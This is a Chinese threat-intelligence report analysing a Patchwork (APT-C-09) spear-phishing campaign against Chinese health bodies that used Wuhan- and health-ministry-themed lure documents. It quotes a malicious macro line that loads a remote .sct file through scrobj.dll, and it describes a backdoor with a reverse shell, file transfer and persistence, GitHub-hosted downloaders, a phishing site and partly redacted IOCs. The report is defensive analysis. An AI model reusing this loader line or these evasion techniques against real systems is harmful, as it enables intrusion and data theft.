专栏首页玄魂工作室烈火烧不尽的“恶性毒草”—— 摩诃草APT组织的攻击活动

烈火烧不尽的“恶性毒草”—— 摩诃草APT组织的攻击活动

一. 概述

印度背景的APT组织代号为APT-C-09,又名摩诃草,白象,PatchWork, angOver,VICEROY TIGER,The Dropping Elephan。

摩诃草组织主要针对中国、巴基斯坦等亚洲地区国家进行网络间谍活动,其中以窃取敏感信息为主。相关攻击活动最早可以追溯到2009年11月,至今还非常活跃。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击,其中以科研教育领域为主。

摩诃草组织最早由Norman安全公司于2013年曝光,随后又有其他安全厂商持续追踪并披露该组织的最新活动,但该组织并未由于相关攻击行动曝光而停止对相关目标的攻击,相反从2015年开始更加活跃。

从2009年至今,该组织针对不同国家和领域至少发动了3波攻击行动和1次疑似攻击行动。整个攻击过程使用了大量系统漏洞,其中至少包括一次0day漏洞攻击;该组织所采用的恶意代码非常繁杂。载荷投递的方式相对传统,主要是以鱼叉邮件进行恶意代码的传播,另外部分行动会采用少量水坑方式进行攻击;值得关注的是,在最近一次攻击行动中,出现了基于即时通讯工具和社交网络的恶意代码投递方式,进一步还会使用钓鱼网站进行社会工程学攻击。在攻击目标的选择上,该组织主要针对Windows系统进行攻击,同时我们也发现了存在针对Mac OS X系统的攻击,从2015年开始,甚至出现了针对Android OS移动设备的攻击

Gcow安全团队追影小组于2019.11月底通过监测的手段监测到了该组织的一些针对我国医疗部门的活动.直至2020.2月初,摩诃草APT组织通过投递带有恶意宏文件的xls文件,以及使用带有诱饵文档通过点击下载托管于GitHub上的downloader样本,以及用相应的钓鱼网站,用以侦探情报等一系列活动.这对我国的相关部门具有很大的危害,追影小组对其活动进行了跟踪与分析,写成报告供给各位看官更好的了解该组织的一些手法。

当然肯定有人会问为什么你说的简介里摩诃草组织这么厉害,而这次活动却水平不如之前呢?

本团队的追影小组主观认为因为这次活动只是该组织下的CNC小组所开展的活动,文末会给

出相应的关联证据.不过这只是一家之言还请各路表哥多加批评

注意:文中相关IOCs由于特殊原因不给予放出,敏感信息已经打码处理

二. 样本分析

2.1分析文档(武汉旅行信息收集申请表.xlsm)

该诱饵文档托管于该网址上

http://xxx-xxx.com/%E6%AD%A6%E6%B1%89%E6%97%85%E8%A1%8C%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%94%B3%E8%AF%B7%E8%A1%A8.xlsm

2.1.1.诱饵文档

这是一个含有宏的xlsm电子表格文件,利用社会工程学的办法,诱使目标”启用内容”来执行宏恶意代码

提取的宏代码如下

2.1.2. 恶意宏代码

当目标启用内容后就会执行Workbook_Open的代码

DllInstall False, ByVal StrPtr(Sheet1.Range("X100").Value)

通过加载scrobj.dll调用

远程加载http://45.xxx.xxx.67/window.sct,这种是利用Microsoft系统文件的LOLbin以绕过杀软的监测,达到远程执行代码目的。

其中Sheet1.Range("X100").Value 是小技巧,将payload隐藏在Sheet1中,通过VBA获取下载地址,起到一定混淆保护效果

2.1.3. 恶意sct文件(windows.sct)

通过windows.sct再下载到到启动目录,并重名为Temp.exe,并运行该程序

如下图

系统启动文件夹

2.1.4.后门分析(msupdate.exe)

文件信息:

主要功能:

1.自身拷贝到当前用户的AppData\Roaming和C:\Microsoft目录下并重命名msupdate.exe,并且创建并写入uuid.txt,来标识不同用户

2.通过com组件创建计划任务,实现持久化控制。

3. 与服务器进行C&C通讯,实现了shell,文件上传与下载(ftp),获取屏幕快照功能,达到完全控制目标。

获取uuid通知主机上线

通过http协议与服务器进行通讯,并获取相关指令

上线指令

反向Cmd Shell相关代码

文件上传相关代码

文件下载相关代码

屏幕快照相关代码

2.2 分析文档(卫生部指令.docx)

该文档托管于

http://xxx-xxx.com/h_879834932/%E5%8D%AB%E7%94%9F%E9%83%A8%E6%8C%87%E4%BB%A4.docx

2.2.1 诱饵文档

2.1.2 Downloader分析

诱使目标点击提交按钮,触发Shell.Explorer.1 从internet Explorer下载并运行submit_details.exe木马程序.

文件信息:

功能分析:

1.建立计划任务

2.收集目标机器名,ip,等信息

3.下载后门程序

通过Github 白名单下载文件,绕过IDS检测.

部分代码

4.获取Github上的文件下载路径,目前文件已被删除

2.3 钓鱼网站

钓鱼网址为http://xxx-xxx.com/submit.html伪装成某部门的调查表,收集人员信息

通过whois查询,网站是2020年1月23日注册,2月6日更新后停止访问

三.关联分析

该活动与摩诃草APT组织旗下的CNC小组有着很多的联系

CNC小组取名来自360于2019年底发布的报告《南亚地区APT组织2019年度攻击活动总结》中提及的摩诃草使用新的远程控制木马,同时通过其pdb路径信息中包含了cnc_client的字样,故命名为cnc_client小组.在此次活动中,该组织的特征与之高度类似,故团队猜测该活动的作俑者来源于摩诃草旗下的CNC小组

下面我们将向各位看官详细的描述这几点相同之处

(左边的图来自于360的年度报告,右边的图来自于本次活动的截图)

1).反向shell功能:

2).文件上传功能

3).文件下载功能

并且在该所会连的域名中出现了cnc的字眼,故本小组大胆猜测该小组对原先的cnc_client进行了进一步的修改,但是其主体逻辑框架保持不变。在侧面上反应了该组织也很积极的修改相关的恶意软件代码以躲避杀毒软件的侦查

四.总结

在这次活动中摩诃草组织为了增加其攻击活动的成功性,在诱饵文档中使用了某部门的名称和某部门的徽标以增加其可信性,同时在其托管载荷的网站上引用了nhc这个字符串,Gcow安全团队追影小组在此大胆推测,该组织使用鱼叉邮件的方式去投递含有恶意文档url的邮件.同时在这次活动中所出现的url上也存在”nhc”,”gxv”,”cxp”等字眼,这很大的反应出攻击者对中国元素的了解,社会工程学的使用灵活以及拥有一定的反侦查能力,这无疑是对我国网络安全的一次挑战,还请相关人士多多排查,培养员工安全意识也是重中之重的.

最后本小组也想发发牢骚,其实这样的活动不能说天天都有,但是每一周有一次的频率还是存在的。印度趁人之危固然不对,但是某些借此炒作,搞流量变现的,连样本都没分析透彻,只看只言片语就对该组织的手法以及该国家的网络安全实力立下高判,将自己的无知言论变为吸引别人为自己谋取利益的某些高手。把不正确的情况与思想带给你的关注者,让他们对真实的情况并不了解甚至低估,您难道不觉得心痛吗?这对得起你前辈的初衷吗?鄙人沥肝劝君,万不可一知半解而授业于人。

注意:这里不针对任何个人和团队,只是发发牢骚,说说心里话罢了,切勿对号入座,非常感谢。所说一切,愿与各位共勉也期望各位监督。

五.相关IOC

IOCS

名称

SHA1:ffxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf80b709

武汉旅行信息收集申请表.xlsm

SHA1:4fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx02b3f2

卫生部指令.docx

SHA1:44xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxaa29b0

msupdate.exe(windows.jpeg)

SHA1:76xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7b1b65

submit_details.exe

SHA1:aexxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3c72e7

windows.sct

SHA1:6cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2a92

32368288_lopi9829

C2

https://185.xxx.xx.24/cnc/registerhttps://185.xxx.xx.24/cnc/tasks/requesthttps://185.xxx.xx.24/cnc/tasks/resulthttps://45.xxx.xx.168/qhupdate/pagetip/getconfhttps://45.xxx.xxx.168/qhupdate/pagetip/cloudqueryhttps://45.xxx.xxx.168/qhupdate/msquery

URL

http://xxx-xxx.com/submit.htmlhttp://xxx-xxx.com/%E6%AD%A6%E6%B1%89%E6%97%85%E8%A1%8C%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%94%B3%E8%AF%B7%E8%A1%A8.xlsmhttp://xxx-xxx.com/h_879834932/%E5%8D%AB%E7%94%9F%E9%83%A8%E6%8C%87%E4%BB%A4.docxhttp://45.xxx.xxx.67/window.scthttp://45.xxx.xxx.67/window.jpeghttp://185.xxx.xxx.24/windows.scthttps://github.com/xxxxxx/xx_7xxxxx988/blob/master/submit_details.exehttps://raw.githubusercontent.com/xxxx268/meetingid/master/syncup/token.txthttp://185.xxx.xxx.139/winmail/kt_new.pnghttps://api.github.com/xxxxx/xxxxxx/memeeting/git/blobs/d956fbd55581e178658dd908cb36cd93431cd9e1https://chinaxxxxx-nexx.com/n2012228aumki7339990n/32368288_lopi9829http://xxx-xxx.com/form.html?OZBTg_TFORM

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-02-25

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【实战】MS14-068域权限提升漏洞总结

    此漏洞目前不一定很实用。转载这篇文章的原因,主要是理解问题和解决问题的思路,另外一点是写作思路 -------------------------------...

    用户1631416
  • 实战|记一次SQL注入过WAF思路分享

    因为限制了访问速度, 所以这里我没有选择用御剑等工具去扫, 一般情况下可以先去做下目录扫描

    用户1631416
  • Kali Linux Web渗透测试手册(第二版) - 9.6 - 利用HTTP参数污染

    当HTTP参数在同一请求中重复多次并且服务器以不同的方式处理每个实例时,会发生HTTP参数污染(HPP)攻击,从而导致应用程序中出现异常行为。

    用户1631416
  • 微信小程序的新能力,你真的弄懂了吗?| 小程序问答 #9

    在 3 月 27 日的深夜,微信小程序爆出了包括「开放个人开发者注册」在内的 6 大新能力。

    知晓君
  • 大家看看微信小程序到底有多么疯狂?未来发展前景趋势到底如何?

    微信不仅仅只是一个聊天工具,更是一个致富工具,而微信小程序就是致富之路上的新起点。小程序在一定程度上充当了孵化平台,创业者和个体商户可借助小程序迅速完成首批用户...

    速成应用
  • 神策数据分析SDK全面支持小程序,打造一站式PaaS + SaaS服务

    在iPhone十周年之际,在众多互联网人的朋友圈里发酵月余的小程序,正式席卷而来。作为企业,如何应对小程序的访问用户“凌波微步”来去无痕?数据驱动理念该如何实现...

    BestSDK
  • @所有程序员:是时候都来玩玩它了

    到底是什么功能呢?昨天晚上已经刷爆了朋友圈,看过的朋友可能知道了,那就是:「云开发」功能。

    非著名程序员
  • 【实战】MS14-068域权限提升漏洞总结

    此漏洞目前不一定很实用。转载这篇文章的原因,主要是理解问题和解决问题的思路,另外一点是写作思路 -------------------------------...

    用户1631416
  • 电商小程序的场景使用和营销手段

    当所有人都期待在16年能借用小程序去收割一波新红利的时候,张小龙却与常人期盼不同,让小程序走低调路线,没有大步的向前进;在17年内小程序不断更新自己的能力,在年...

    疯狂的小程序
  • 微信小程序加速能力释放将会成为新的流量洼地

    在 2017 年还剩最后三天的时候,微信小程序上线了「小游戏」板块,千呼万唤后,微信小程序终于正式支持游戏了,小游戏的开放加速了小程序能力释放的过程,让小程序迅...

    速成应用小程序开发平台

扫码关注云+社区

领取腾讯云代金券